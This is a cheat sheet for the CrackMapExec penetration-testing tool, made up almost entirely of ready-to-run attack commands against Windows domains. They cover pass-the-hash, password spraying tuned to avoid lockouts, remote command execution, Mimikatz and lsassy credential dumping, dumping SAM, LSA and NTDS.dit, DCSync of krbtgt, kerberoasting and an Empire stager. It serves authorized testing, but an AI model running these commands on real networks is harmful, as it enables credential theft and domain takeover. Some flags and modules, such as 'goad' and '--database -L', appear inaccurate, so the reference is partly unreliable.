CrackMapExec Cheat Sheet

Overview

CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It's often described as a "Swiss Army knife" for network penetration testing, allowing for enumeration, credential testing, and command execution across multiple protocols.

⚠️ Warning: CrackMapExec is a security testing tool that should only be used in environments where you have explicit permission to do so.

Installation

Using pipx (Recommended)

# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec

On Kali Linux

sudo apt update
sudo apt install -y crackmapexec

From GitHub

git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install

Using Docker

docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec

Basic Usage

General Syntax

crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]

Supported Protocols

smb: Server Message Block
winrm: Windows Remote Management
ldap: Lightweight Directory Access Protocol
mssql: Microsoft SQL Server
ssh: Secure Shell
rdp: Remote Desktop Protocol
ftp: File Transfer Protocol

Target Specification

# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt

Authentication Methods

Username and Password

# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Pass-the-Hash

# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt

Local Authentication

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth

Domain Authentication

crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN

SMB Protocol Commands

Basic Enumeration

# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

Command Execution

# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

File Operations

# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'

WinRM Protocol Commands

Basic Enumeration

# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'

Command Execution

# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'

LDAP Protocol Commands

Basic Enumeration

# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts

Advanced Enumeration

# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt

MSSQL Protocol Commands

Basic Enumeration

# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'

Command Execution

# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'

Module Usage

Module Management

# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2

Common Modules

Mimikatz

# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'

Empire

# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http

PowerView

# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'

BloodHound

# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All

Lsassy

# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy

Enum_DNS

# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns

GOAD

# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad

Advanced Techniques

Password Spraying

# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10

Credential Harvesting

# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds

Database Operations

Initialize Database

crackmapexec smb 192.168.1.0/24 --database

View Database

# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1

Common Options

Option	Description
`-h, --help`	Show help message and exit
`-t THREADS`	Set number of concurrent threads (default: 100)
`--timeout TIMEOUT`	Set timeout for connections (default: 5 seconds)
`--verbose`	Enable verbose output
`--debug`	Enable debug output
`--continue-on-success`	Continue authentication attempts even after success
`--no-bruteforce`	No bruteforce, only use provided credentials
`--fail-limit LIMIT`	Number of failed login attempts before giving up on a host
`--jitter JITTER`	Add random delay between authentication attempts (in seconds)
`--local-auth`	Authenticate using local accounts instead of domain
`-d, --domain DOMAIN`	Domain to authenticate to
`--no-output`	Do not display output
`--output-file FILE`	Write output to file
`--log`	Enable logging to file (default: ~/.cme/logs/)

Protocol-Specific Options

SMB Options

Option	Description
`--shares`	List available shares
`--sessions`	List active sessions
`--disks`	List disks
`--loggedon-users`	List logged-on users
`--users`	List domain users
`--groups`	List domain groups
`--local-groups`	List local groups
`--pass-pol`	Get password policy
`--rid-brute [MAX_RID]`	Enumerate users by bruteforcing RID
`--sam`	Dump SAM hashes
`--lsa`	Dump LSA secrets
`--ntds`	Dump NTDS.dit
`--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\}`	Method to execute commands

LDAP Options

Option	Description
`--users`	List domain users
`--groups`	List domain groups
`--computers`	List domain computers
`--domain`	Get domain information
`--pass-pol`	Get password policy
`--trusts`	Get domain trusts
`--asreproast [OUTFILE]`	Get AS-REP roastable users
`--kerberoasting [OUTFILE]`	Get kerberoastable users
`--trusted-for-delegation`	Get users/computers with unconstrained delegation
`--allowed-to-delegate`	Get users/computers with constrained delegation

WinRM Options

Option	Description
`--port [PORT]`	WinRM port (default: 5985)
`--ssl`	Use SSL for WinRM

MSSQL Options

Option	Description
`--port [PORT]`	MSSQL port (default: 1433)
`-q QUERY`	Execute SQL query

CrackMapExec Cheat Sheet

Overview

Installation

Using pipx (Recommended)

On Kali Linux

From GitHub

Using Docker

Basic Usage

General Syntax

Supported Protocols

Target Specification

Authentication Methods

Username and Password

Pass-the-Hash

Local Authentication

Domain Authentication

SMB Protocol Commands

Basic Enumeration

Command Execution

File Operations

WinRM Protocol Commands

Basic Enumeration

Command Execution

LDAP Protocol Commands

Basic Enumeration

Advanced Enumeration

MSSQL Protocol Commands

Basic Enumeration

Command Execution

Module Usage

Module Management

Common Modules

Mimikatz

Empire

PowerView

BloodHound

Lsassy

Enum_DNS

GOAD

Advanced Techniques

Password Spraying

Credential Harvesting

Database Operations

Initialize Database

View Database

Common Options

Protocol-Specific Options

SMB Options

LDAP Options

WinRM Options

MSSQL Options

Resources